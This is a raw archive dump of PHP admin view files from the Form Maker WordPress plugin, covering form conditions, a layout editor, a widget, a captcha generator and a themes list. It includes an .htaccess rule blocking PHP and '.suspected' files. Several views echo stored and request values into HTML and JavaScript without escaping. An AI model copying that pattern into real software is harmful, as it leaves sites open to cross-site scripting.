														if ($types[$key1]=="type_checkbox" || $types[$key1]=="type_paypal_checkbox")
															$multiple = 'multiple="multiple" class="multiple_select"';
														else
															$multiple ='';
														
														$key_select_or_input = $key1;
													}	
													else
														$selected ='';
													if($field_label[$k]!=$ids[$key1])
													echo '<option id="'.$k.'_'.$key1.'" value="'.$ids[$key1].'" '.$selected.'>'.$value.'</option>';
											
												}
									
												?>	
											</select>
											
											<select id="is_select<?php echo $k; ?>_<?php echo $key; ?>" style="vertical-align: top; width:94px;">
											<option value="==" <?php if($param_values[1]=="==") echo 'selected="selected"'; ?>>is</option>
											<option value="!=" <?php if($param_values[1]=="!=") echo 'selected="selected"'; ?>>is not</option>
											<option value="%" <?php if($param_values[1]=="%") echo 'selected="selected"'; ?>>like</option>

											<option value="!%" <?php if($param_values[1]=="!%") echo 'selected="selected"'; ?>>not like</option>

											<option value="=" <?php if($param_values[1]=="=") echo 'selected="selected"'; ?>>empty</option>

											<option value="!" <?php if($param_values[1]=="!") echo 'selected="selected"'; ?>>not empty</option>

											</select>
											
											<?php if ($key_select_or_input !== '' && in_array($types[$key_select_or_input],$select_type_fields)) : ?>
											<select id="field_value<?php echo $k; ?>_<?php echo $key; ?>" <?php echo $multiple; ?> style="width: 200px;">
											<?php  
											switch($types[$key_select_or_input])
											{
												case "type_own_select":
												case "type_paypal_select":
													$w_size = explode('*:*w_size*:*',$paramss[$key_select_or_input]);	
												break;
												
												case "type_radio":
												case "type_checkbox":
												case "type_paypal_radio":
												case "type_paypal_checkbox":
												case "type_paypal_shipping":
													$w_size = explode('*:*w_flow*:*',$paramss[$key_select_or_input]);	
												break;	
											}	
											
												$w_choices = explode('*:*w_choices*:*',$w_size[1]);
												$w_choices_array = explode('***',$w_choices[0]);
												
												$w_choices_price = explode('*:*w_choices_price*:*',$w_choices[1]);
												$w_choices_price_array = explode('***',$w_choices_price[0]);
													
												for($m=0; $m<count($w_choices_array); $m++)	
												{
													if($types[$key_select_or_input]=="type_paypal_checkbox" || $types[$key_select_or_input]=="type_paypal_radio" || $types[$key_select_or_input]=="type_paypal_shipping" || $types[$key_select_or_input]=="type_paypal_select")
														$w_choice = $w_choices_array[$m].'*:*value*:*'.$w_choices_price_array[$m];
													else
														$w_choice = $w_choices_array[$m];
														
													if(in_array(esc_html($w_choice),$multiselect))
													{
														$selected = 'selected="selected"';
													}	
													else
														$selected ='';

								if(strpos($w_choices_array[$m], '[') === false && strpos($w_choices_array[$m], ']') === false && strpos($w_choices_array[$m], ':') === false) {
													echo '<option id="choise_'.$k.'_'.$m.'" value="'.$w_choice.'" '.$selected.'>'.$w_choices_array[$m].'</option>';
								}
										}
										
										if($types[$key_select_or_input]=="type_address")
										{
											$w_countries = array("","Afghanistan","Albania","Algeria","Andorra","Angola","Antigua and Barbuda","Argentina","Armenia","Australia","Austria","Azerbaijan","Bahamas","Bahrain","Bangladesh","Barbados","Belarus","Belgium","Belize","Benin","Bhutan","Bolivia","Bosnia and Herzegovina","Botswana","Brazil","Brunei","Bulgaria","Burkina Faso","Burundi","Cambodia","Cameroon","Canada","Cape Verde","Central African Republic","Chad","Chile","China","Colombia","Comoros","Congo (Brazzaville)","Congo","Costa Rica","Cote d'Ivoire","Croatia","Cuba","Cyprus","Czech Republic","Denmark","Djibouti","Dominica","Dominican Republic","East Timor (Timor Timur)","Ecuador","Egypt","El Salvador","Equatorial Guinea","Eritrea","Estonia","Ethiopia","Fiji","Finland","France","Gabon","Gambia, The","Georgia","Germany","Ghana","Greece","Grenada","Guatemala","Guinea","Guinea-Bissau","Guyana","Haiti","Honduras","Hungary","Iceland","India","Indonesia","Iran","Iraq","Ireland","Israel","Italy","Jamaica","Japan","Jordan","Kazakhstan","Kenya","Kiribati","Korea, North","Korea, South","Kuwait","Kyrgyzstan","Laos","Latvia","Lebanon","Lesotho","Liberia","Libya","Liechtenstein","Lithuania","Luxembourg","Macedonia","Madagascar","Malawi","Malaysia","Maldives","Mali","Malta","Marshall Islands","Mauritania","Mauritius","Mexico","Micronesia","Moldova","Monaco","Mongolia","Morocco","Mozambique","Myanmar","Namibia","Nauru","Nepal","Netherlands","New Zealand","Nicaragua","Niger","Nigeria","Norway","Oman","Pakistan","Palau","Panama","Papua New Guinea","Paraguay","Peru","Philippines","Poland","Portugal","Qatar","Romania","Russia","Rwanda","Saint Kitts and Nevis","Saint Lucia","Saint Vincent","Samoa","San Marino","Sao Tome and Principe","Saudi Arabia","Senegal","Serbia and Montenegro","Seychelles","Sierra Leone","Singapore","Slovakia","Slovenia","Solomon Islands","Somalia","South Africa","Spain","Sri Lanka","Sudan","Suriname","Swaziland","Sweden","Switzerland","Syria","Taiwan","Tajikistan","Tanzania","Thailand","Togo","Tonga","Trinidad and Tobago","Tunisia","Turkey","Turkmenistan","Tuvalu","Uganda","Ukraine","United Arab Emirates","United Kingdom","United States","Uruguay","Uzbekistan","Vanuatu","Vatican City","Venezuela","Vietnam","Yemen","Zambia","Zimbabwe");	
											$w_options = '';
											foreach($w_countries as $w_country)
											{
												if(in_array($w_country,$multiselect))
												{
													$selected = 'selected="selected"';
												}	
												else
													$selected ='';
																
												echo '<option value="'.$w_country.'" '.$selected.'>'.$w_country.'</option>';
											}
										}
							
										?>	
									</select>
									<?php else : 
									if($key_select_or_input != '' && ($types[$key_select_or_input]=="type_number" || $types[$key_select_or_input]=="type_phone"))
										$onkeypress_function = "onkeypress='return check_isnum_space(event)'";
									else
										if($key_select_or_input != '' && $types[$key_select_or_input]=="type_paypal_price")
											$onkeypress_function = "onkeypress='return check_isnum_point(event)'";
										else
											$onkeypress_function = "";
									?>
									<input id="field_value<?php echo $k; ?>_<?php echo $key; ?>" type="text" value="<?php echo $param_values[2];?>" <?php echo $onkeypress_function; ?> style=" width: 200px;"><?php endif; ?>
									
									<img src="<?php echo WD_FMC_URL . '/images/delete.png?ver='. get_option("wd_form_maker_version").''; ?>" id="delete_condition<?php echo $k; ?>_<?php echo $key; ?>" onclick="delete_field_condition('<?php echo $k; ?>_<?php echo $key; ?>')" style="vertical-align: middle;">
									</div>
									<?php endif;
								}
							}

						?>
						</div>
						<?php endif; 
						} 
						?>
					<input type="hidden" id="condition" name="condition" value="<?php echo $row->condition; ?>" />	
				</fieldset>
				
				</div>
				<input type="hidden" name="boxchecked" value="0">
				<input type="hidden" name="fieldset_id" id="fieldset_id" value="<?php echo WDW_FMC_Library::get('fieldset_id', 'general'); ?>" />
				<input type="hidden" id="task" name="task" value=""/>
				<input type="hidden" id="current_id" name="current_id" value="<?php echo $row->id; ?>" />
			</form>
		<script>
		jQuery(window).load(function () {
			form_maker_options_tabs(jQuery("#fieldset_id").val());
			fm_popup();
			function hide_email_labels(event) {
				var e = event.toElement || event.relatedTarget;
				if (e.parentNode == this || e == this) {
					return;
				}
				this.style.display="none";
			}
			if(document.getElementById('mail_from_labels')) {
				document.getElementById('mail_from_labels').addEventListener('mouseout',hide_email_labels,true);
			}
			if(document.getElementById('mail_subject_labels')) {
				document.getElementById('mail_subject_labels').addEventListener('mouseout',hide_email_labels,true);
			}
			if(document.getElementById('mail_from_name_user_labels')) {
				document.getElementById('mail_from_name_user_labels').addEventListener('mouseout',hide_email_labels,true);
			}
			if(document.getElementById('mail_subject_user_labels')) {
				document.getElementById('mail_subject_user_labels').addEventListener('mouseout',hide_email_labels,true);
			}
			if(document.getElementById('post_title_labels')) {
				document.getElementById('post_title_labels').addEventListener('mouseout',hide_email_labels,true);
			}
			if(document.getElementById('post_tags_labels')) {
				document.getElementById('post_tags_labels').addEventListener('mouseout',hide_email_labels,true);
			}
			if(document.getElementById('post_featured_image_labels')) {
				document.getElementById('post_featured_image_labels').addEventListener('mouseout',hide_email_labels,true);
			}
			if(document.getElementById('dbox_upload_dir_labels')) {
				document.getElementById('dbox_upload_dir_labels').addEventListener('mouseout',hide_email_labels,true);
			}
		});
		function wd_fm_apply_options(task) {
			set_condition();
			fm_set_input_value('task', task);
			document.getElementById('adminForm').submit();
		}
		</script>
		<?php
	}

	public function form_layout($id) {
		$row = $this->model->get_row_data($id);
		$ids = array();
		$types = array();
		$labels = array();
		$fields = explode('*:*new_field*:*', $row->form_fields);
		$fields = array_slice($fields, 0, count($fields) - 1);
		foreach ($fields as $field) {
			$temp = explode('*:*id*:*', $field);
			array_push($ids, $temp[0]);
			$temp = explode('*:*type*:*', $temp[1]);
			array_push($types, $temp[0]);
			$temp = explode('*:*w_field_label*:*', $temp[1]);
			array_push($labels, $temp[0]);
		}
		?>
		<script>
		var form_front = '<?php echo addslashes($row->form_front);?>';
		var custom_front = '<?php echo addslashes($row->custom_front);?>';
		if (custom_front == '') {
			custom_front = form_front;
		}
		function submitbutton() {
			if (jQuery('#autogen_layout').is(':checked')) {
				jQuery('#custom_front').val(custom_front.replace(/\s+/g, ' ').replace(/> </g, '><'));
			}
			else {
				jQuery('#custom_front').val(editor.getValue().replace(/\s+/g, ' ').replace(/> </g, '><'));
			}
		}
		function insertAtCursor_form(myId, myLabel) {
			if (jQuery('#autogen_layout').is(':checked')) {
				alert("Uncheck the Auto-Generate Layout box.");
				return;
			}
			myValue = '<div wdid="' + myId + '" class="wdform_row">%' + myId + ' - ' + myLabel + '%</div>';
			line = editor.getCursor().line;
			ch = editor.getCursor().ch;
			text = editor.getLine(line);
			text1 = text.substr(0, ch);
			text2 = text.substr(ch);
			text = text1 + myValue + text2;
			editor.setLine(line, text);
			editor.focus();
		}
		function autogen(status) {
			if (status) {
				custom_front = editor.getValue();
				editor.setValue(form_front);
				editor.setOption('readOnly', true);
				autoFormat();
			}
			else {
				editor.setValue(custom_front);
				editor.setOption('readOnly', false);
				autoFormat();
			}
		}
		function autoFormat() {
			CodeMirror.commands["selectAll"](editor);
			editor.autoFormatRange(editor.getCursor(true), editor.getCursor(false));
			editor.scrollTo(0,0);
		}
		</script>

		<div class="fm_layout">
			<form action="admin.php?page=manage_fmc" method="post" name="adminForm" enctype="multipart/form-data">
				<?php wp_nonce_field('nonce_fmc', 'nonce_fmc'); ?>
				<div class="fm-layout-actions">
					<div class="fm-page-actions">
						<button class="fm-button save-button small" onclick="submitbutton(); fm_set_input_value('task', 'save_layout');">
							Save
							<span></span>
						</button>
						<button class="fm-button apply-button small" onclick="submitbutton(); fm_set_input_value('task', 'apply_layout');">
							Apply
							<span></span>
						</button>
						<button class="fm-button cancel-button small" onclick="fm_set_input_value('task', 'cancel_options');">
							Cancel
							<span></span>
						</button>
					</div>
				</div>
				<div class="fm-layout-content">
					<h2 style="clear: both;">Description</h2>
					<p>To customize the layout of the form fields uncheck the Auto-Generate Layout box and edit the HTML.</p>
					<p>You can change positioning, add in-line styles and etc. Click on the provided buttons to add the corresponding field.<br /> This will add the following line:
					  <b><span class="cm-tag">&lt;div</span> <span class="cm-attribute">wdid</span>=<span class="cm-string">"example_id"</span> <span class="cm-attribute">class</span>=<span class="cm-string">"wdform_row"</span><span class="cm-tag">&gt;</span>%example_id - Example%<span class="cm-tag">&lt;/div&gt;</span></b>
					  , where <b><span class="cm-tag">&lt;div&gt;</span></b> is used to set a row.</p>
					<p>To return to the default settings you should check Auto-Generate Layout box.</p>
					<h3 style="color:red">Notice</h3>
					<p>Make sure not to publish the same field twice. This will cause malfunctioning of the form.</p>
					<hr/>
					<label for="autogen_layout" style="font-size: 20px; line-height: 45px; margin-left: 10px;">Auto Generate Layout? </label>
					<input type="checkbox" value="1" name="autogen_layout" id="autogen_layout" <?php echo (($row->autogen_layout) ? 'checked="checked"' : ''); ?> />
					<input type="hidden" name="custom_front" id="custom_front" value="" />
					<input type="hidden" id="task" name="task" value=""/>
					<input type="hidden" id="current_id" name="current_id" value="<?php echo $row->id; ?>" />
					<br/>
					<?php
					foreach($ids as $key => $id) {
						if ($types[$key] != "type_section_break") {
							?>
							<button onClick="insertAtCursor_form('<?php echo $ids[$key]; ?>','<?php echo $labels[$key]; ?>')" class="fm_label_buttons" title="<?php echo $labels[$key]; ?>"><?php echo $labels[$key]; ?></button>
							<?php
						}
					}
					?>
				</form>	
			</div>
			<br /><br />
			<button class="fm_submit_layout button button-secondary button-hero" onclick="autoFormat()"><strong>Apply Source Formatting</strong>  <em>(ctrl-enter)</em></button>
			<textarea id="source" name="source" style="display: none;"></textarea>
		</div>
		<script>
		var editor = CodeMirror.fromTextArea(document.getElementById("source"), {
			lineNumbers: true,
			lineWrapping: true,
			mode: "htmlmixed",
			value: form_front
		});
		if (jQuery('#autogen_layout').is(':checked')) {
			editor.setOption('readOnly',  true);
			editor.setValue(form_front);
		}
		else {
			editor.setOption('readOnly',  false);
			editor.setValue(custom_front);
		}
		jQuery('#autogen_layout').click(function() {
			autogen(jQuery(this).is(':checked'));
		});
		autoFormat();
		</script>
		<?php
	}

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/views/FMViewWidget_fmc.php000060400000010041152434416630012630 0ustar00<?php

class FMViewWidget_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  private $model;

  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct($model) {
    $this->model = $model;
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////

  public function display() {
  }

  function widget($args, $instance) {
    extract($args);
    $title = $instance['title'];
    $form_id = (isset($instance['form_id']) ? $instance['form_id'] : 0);
    // Before widget.
    echo $before_widget;
    // Title of widget.
    if ($title) {
      echo $before_title . $title . $after_title;
    }
    // Widget output.
    require_once(WD_FMC_DIR . '/frontend/controllers/FMControllerForm_maker_fmc.php');
    $controller_class = 'FMControllerForm_maker_fmc';
    $controller = new $controller_class();
    echo $controller->execute($instance['form_id']);
    // After widget.
    echo $after_widget;
  }
  
  // Widget Control Panel.
  function form($instance, $id_title, $name_title, $id_form_id, $name_form_id) {
     $defaults = array(
      'title' => '',
      'form_id' => 0
    );
    $instance = wp_parse_args((array)$instance, $defaults);
    global $wpdb; ?>
    <p>
      <label for="<?php echo $id_title; ?>">Title:</label>
      <input class="widefat" id="<?php echo $id_title; ?>" name="<?php echo $name_title; ?>" type="text" value="<?php echo $instance['title']; ?>"/>
      <label for="<?php echo $id_form_id; ?>">Select a form:</label>
      <select name="<?php echo $name_form_id; ?>" id="<?php echo $id_form_id; ?>" style="width:225px;text-align:center;">
        <option style="text-align:center" value="0">- Select a Form -</option>
        <?php
        $ids_Form_Maker = $this->model->get_gallery_rows_data();
        foreach ($ids_Form_Maker as $arr_Form_Maker) {
          ?>
          <option value="<?php echo $arr_Form_Maker->id; ?>" <?php if ($arr_Form_Maker->id == $instance['form_id']) {
            echo "SELECTED";
          } ?>><?php echo $arr_Form_Maker->title; ?></option>
          <?php }?>
      </select>
    </p>
    <?php
  }
  
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/views/FMViewFormcontactwdcaptcha.php000060400000011367152434416630014732 0ustar00<?php

class FMViewFormcontactwdcaptcha {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  private $model;


  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct($model) {
    $this->model = $model;
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function display() {
	
    if (isset($_GET['action']) && esc_html($_GET['action']) == 'formcontactwdcaptcha') {
      $i = (isset($_GET["i"]) ? esc_html($_GET["i"]) : '');
      $r2 = (isset($_GET["r2"]) ? (int) $_GET["r2"] : 0);
      $rrr = (isset($_GET["rrr"]) ? (int) $_GET["rrr"] : 0);
      $randNum = 0 + $r2 + $rrr;
      $digit = (isset($_GET["digit"]) ? (int) $_GET["digit"] : 6);
      $cap_width = $digit * 10 + 15;
      $cap_height = 26;
      $cap_quality = 100;
      $cap_length_min = $digit;
      $cap_length_max = $digit;
      $cap_digital = 1;
      $cap_latin_char = 1;
      function code_generic($_length, $_digital = 1, $_latin_char = 1) {
        $dig = array(0, 1, 2, 3, 4, 5, 6, 7, 8, 9);
        $lat = array('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z');
        $main = array();
        if ($_digital) {
          $main = array_merge($main, $dig);
        }
        if ($_latin_char) {
          $main = array_merge($main, $lat);
        }
        shuffle($main);
        $pass = substr(implode('', $main), 0, $_length);
        return $pass;
      }
      $l = rand($cap_length_min, $cap_length_max);
      $code = code_generic($l, $cap_digital, $cap_latin_char);
      if (session_id() == '' || (function_exists('session_status') && (session_status() == PHP_SESSION_NONE))) {
        @session_start();
      }

      $_SESSION[$i . '_wd_captcha_code'] = md5($code);
      $canvas = imagecreatetruecolor($cap_width, $cap_height);
      $c = imagecolorallocate($canvas, rand(150, 255), rand(150, 255), rand(150, 255));
      imagefilledrectangle($canvas, 0, 0, $cap_width, $cap_height, $c);
      $count = strlen($code);
      $color_text = imagecolorallocate($canvas, 0, 0, 0);
      for ($it = 0; $it < $count; $it++) {
        $letter = $code[$it];
        imagestring($canvas, 6, (10 * $it + 10), $cap_height / 4, $letter, $color_text);
      }
      for ($c = 0; $c < 150; $c++) {
        $x = rand(0, $cap_width - 1);
        $y = rand(0, 29);
        $col = '0x' . rand(0, 9) . '0' . rand(0, 9) . '0' . rand(0, 9) . '0';
        imagesetpixel($canvas, $x, $y, $col);
      }
      header('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
      header('Cache-Control: no-store, no-cache, must-revalidate');
      header('Cache-Control: post-check=0, pre-check=0', FALSE);
      header('Pragma: no-cache');
      header('Content-Type: image/jpeg');
      imagejpeg($canvas, NULL, $cap_quality);
    }
    die('');
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/views/.htaccess000044400000000424152434416630010575 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>admin/views/FMViewThemes_fmc.php000060400000026314152434416630012644 0ustar00<?php
class FMViewThemes_fmc {
	////////////////////////////////////////////////////////////////////////////////////////
	// Events                                                                             //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Constants                                                                          //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Variables                                                                          //
	////////////////////////////////////////////////////////////////////////////////////////
	private $model;

	////////////////////////////////////////////////////////////////////////////////////////
	// Constructor & Destructor                                                           //
	////////////////////////////////////////////////////////////////////////////////////////
	public function __construct($model) {
	$this->model = $model;
	}

  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function display() {
    $rows_data = $this->model->get_rows_data();
    $page_nav = $this->model->page_nav();
    $search_value = ((isset($_POST['search_value'])) ? esc_html($_POST['search_value']) : '');
    $search_select_value = ((isset($_POST['search_select_value'])) ? (int)$_POST['search_select_value'] : 0);
    $asc_or_desc = ((isset($_POST['asc_or_desc']) && $_POST['asc_or_desc'] == 'desc') ? 'desc' : 'asc');
	$order_by_array = array('id', 'title', 'default');
    $order_by = isset($_POST['order_by']) && in_array(esc_html(stripslashes($_POST['order_by'])), $order_by_array) ? esc_html(stripslashes($_POST['order_by'])) :  'id';
    $order_class = 'manage-column column-title sorted ' . $asc_or_desc;
    $ids_string = '';
    ?>
    <div class="fm-user-manual">
		This section allows you to create, edit form themes.
		<a style="color: blue; text-decoration: none;" target="_blank" href="https://web-dorado.com/wordpress-form-maker-guide-2.html">Read More in User Manual</a>
	</div>
	<div class="fm-upgrade-pro">
		<a target="_blank" href="https://web-dorado.com/files/fromContactForm.php">
			<div class="fm-upgrade-img">
				UPGRADE TO PRO VERSION 
				<span></span>
			</div>
		</a>
	</div>
	<div class="fm-clear"></div>
    <form class="wrap" id="themes_form" method="post" action="admin.php?page=themes_fmc" style="width:99%;">
		<?php wp_nonce_field('nonce_fmc', 'nonce_fmc'); ?>
		<div class="fm-page-banner themes-banner">
			<div class="theme_icon">
			</div>
			<div class="fm-logo-title">Themes</div>
			<button class="fm-button add-button medium" style="margin-left: 31px;" onclick="fm_set_input_value('task', 'add'); fm_form_submit(event, 'themes_form');">
				<span></span>
				Add New
			</button>
			<div class="fm-page-actions">
				<button class="fm-button delete-button small" onclick="if (confirm('Do you want to delete selected item(s)?')) { fm_set_input_value('task', 'delete_all'); } else { return false; }">
					<span></span>
					Delete
				</button>
			</div>
		</div>	
		<div class="fm-clear"></div>		
		<div class="tablenav top">
			<?php
				WDW_FMC_Library::search('Title', $search_value, 'themes_form');
				WDW_FMC_Library::html_page_nav($page_nav['total'], $page_nav['limit'], 'themes_form');
			?>
		</div>
		<table class="wp-list-table widefat fixed pages">
			<thead>
				<th class="manage-column column-cb check-column table_small_col"><input id="check_all" type="checkbox" style="margin:0;"/></th>
				<th class="table_small_col <?php if ($order_by == 'id') { echo $order_class; } ?>">
					<a onclick="fm_set_input_value('task', ''); fm_set_input_value('order_by', 'id'); fm_set_input_value('asc_or_desc', '<?php echo (($order_by == 'id' && $asc_or_desc == 'asc') ? 'desc' : 'asc'); ?>'); fm_form_submit(event, 'themes_form')" href="">
					<span>ID</span><span class="sorting-indicator"></span></a>
				</th>
				<th class="<?php if ($order_by == 'title') { echo $order_class; } ?>">
					<a onclick="fm_set_input_value('task', ''); fm_set_input_value('order_by', 'title'); fm_set_input_value('asc_or_desc', '<?php echo (($order_by == 'title' && $asc_or_desc == 'asc') ? 'desc' : 'asc'); ?>'); fm_form_submit(event, 'themes_form')" href="">
					<span>Title</span><span class="sorting-indicator"></span></a>
				</th>
				<th class="table_big_col <?php if ($order_by == 'default') { echo $order_class; } ?>">
					<a onclick="fm_set_input_value('task', ''); fm_set_input_value('order_by', 'default'); fm_set_input_value('asc_or_desc', '<?php echo (($order_by == 'default' && $asc_or_desc == 'asc') ? 'desc' : 'asc'); ?>'); fm_form_submit(event, 'themes_form')" href="">
					<span>Default</span><span class="sorting-indicator"></span></a>
				</th>
				<th class="table_small_col">Edit</th>
				<th class="table_small_col">Delete</th>
			</thead>
			<tbody id="tbody_arr">
			<?php
				if ($rows_data) {
					foreach ($rows_data as $row_data) {
						$alternate = (!isset($alternate) || $alternate == 'class="alternate"') ? '' : 'class="alternate"';
						$default_image = (($row_data->default) ? 'default' : 'notdefault');
						$default = (($row_data->default) ? '' : 'setdefault');
						?>
						<tr id="tr_<?php echo $row_data->id; ?>" <?php echo $alternate; ?>>
							<td class="table_small_col check-column">
								<input id="check_<?php echo $row_data->id; ?>" name="check_<?php echo $row_data->id; ?>" type="checkbox"/>
							</td>
							<td class="table_small_col"><?php echo $row_data->id; ?></td>
							<td>
								<a onclick="fm_set_input_value('task', 'edit'); fm_set_input_value('current_id', '<?php echo $row_data->id; ?>'); fm_form_submit(event, 'themes_form')" href="" title="Edit"><?php echo $row_data->title; ?></a>
							</td>
							<td class="table_big_col">
								<?php if ($default != '') { ?>
									<a onclick="fm_set_input_value('task', '<?php echo $default; ?>'); fm_set_input_value('current_id', '<?php echo $row_data->id; ?>'); fm_form_submit(event, 'themes_form')" href="">
								<?php } ?>
									<img src="<?php echo WD_FMC_URL . '/images/' . $default_image . '.png?ver='. get_option("wd_form_maker_version").''; ?>" />
								<?php if ($default != '') { ?>
									</a>
								<?php } ?>
							</td>
							<td class="table_small_col">
								<button class="fm-icon edit-icon" onclick="fm_set_input_value('task', 'edit'); fm_set_input_value('current_id', '<?php echo $row_data->id; ?>'); fm_form_submit(event, 'themes_form');">
									<span></span>
								</button>
							</td>
							<td class="table_small_col">
								<button class="fm-icon delete-icon" onclick="if (confirm('Do you want to delete selected item(s)?')) { fm_set_input_value('task', 'delete'); fm_set_input_value('current_id', '<?php echo $row_data->id; ?>'); fm_form_submit(event, 'themes_form'); } else {return false;}">
									<span></span>
								</button>
							</td>
						</tr>
						<?php
						$ids_string .= $row_data->id . ',';
					}
				}
				?>
			</tbody>
		</table>
		<input id="task" name="task" type="hidden" value=""/>
		<input id="current_id" name="current_id" type="hidden" value=""/>
		<input id="ids_string" name="ids_string" type="hidden" value="<?php echo $ids_string; ?>"/>
		<input id="asc_or_desc" name="asc_or_desc" type="hidden" value="asc"/>
		<input id="order_by" name="order_by" type="hidden" value="<?php echo $order_by; ?>"/>
    </form>
    <?php
	}

	public function edit($id, $reset) {
		$row = $this->model->get_row_data($id, $reset);
		$page_title = (($id != 0) ? 'Edit theme ' . $row->title : 'Create new theme');
		?>
		<style>
		.CodeMirror {
			border: 1px solid #ccc;
			font-size: 12px;
			margin-bottom: 6px;
			background: white;
		}
		</style>
		<div class="fm-user-manual">
			This section allows you to create, edit form themes.
			<a style="color: blue; text-decoration: none;" target="_blank" href="https://web-dorado.com/wordpress-form-maker-guide-2.html">Read More in User Manual</a>
		</div>
		<div class="fm-upgrade-pro">
			<a target="_blank" href="https://web-dorado.com/files/fromContactForm.php">
			<div class="fm-upgrade-img">
				UPGRADE TO PRO VERSION 
				<span></span>
			</div>
		</a>
		</div>
		<div class="fm-clear"></div>
		<form class="wrap" method="post" action="admin.php?page=themes_fmc" style="width:99%;">
			<?php wp_nonce_field('nonce_fmc', 'nonce_fmc'); ?>     
			<div class="fm-page-header">
				<div class="fm-page-title">
					<?php echo $page_title; ?>
				</div>
				<div class="fm-page-actions">
					<button class="fm-button save-button small" onclick="if (fm_check_required('title', 'Title')) {return false;}; fm_set_input_value('task', 'save');">
						<span></span>
						Save
					</button>
					<button class="fm-button apply-button small" onclick="if (fm_check_required('title', 'Title')) {return false;}; fm_set_input_value('task', 'apply');">
						<span></span>
						Apply
					</button>
					<button class="fm-button cancel-button small" onclick="fm_set_input_value('task', 'cancel');">
						<span></span>
						Cancel
					</button>
				</div>
			</div>

			<table style="clear:both;">
				<tbody>
					<tr>
						<td class="fm_label"><label for="title">Title: <span style="color:#FF0000;"> * </span> </label></td>
						<td><input type="text" id="title" name="title" value="<?php echo $row->title; ?>" class="fm_text_input" /></td>
					</tr>
					<tr>
						<td class="fm_label"><label for="css">Css: </label></td>
						<td style="width: 90%;"><textarea id="css" name="css" rows="30" style="width: 100%;"><?php echo htmlspecialchars($row->css) ?></textarea></td>
					</tr>
				</tbody>
			</table>
			<input type="hidden" id="task" name="task" value=""/>
			<input type="hidden" id="current_id" name="current_id" value="<?php echo $row->id; ?>"/>
			<input type="hidden" id="default" name="default" value="<?php echo $row->default; ?>"/>
		</form>
		<script>
			var editor = CodeMirror.fromTextArea(document.getElementById("css"), {
				lineNumbers: true,
				lineWrapping: true,
				mode: "css"
			});
      
			CodeMirror.commands["selectAll"](editor);
			editor.autoFormatRange(editor.getCursor(true), editor.getCursor(false));
			editor.scrollTo(0,0);      
		</script>
		<?php
	}

	////////////////////////////////////////////////////////////////////////////////////////
	// Getters & Setters                                                                  //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Private Methods                                                                    //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Listeners                                                                          //
	////////////////////////////////////////////////////////////////////////////////////////
}admin/views/FMViewFromipinfoinpopup_fmc.php000060400000010532152434416630015135 0ustar00<?php

class FMViewFromipinfoinpopup_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  private $model;


  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct($model) {
    $this->model = $model;
  }
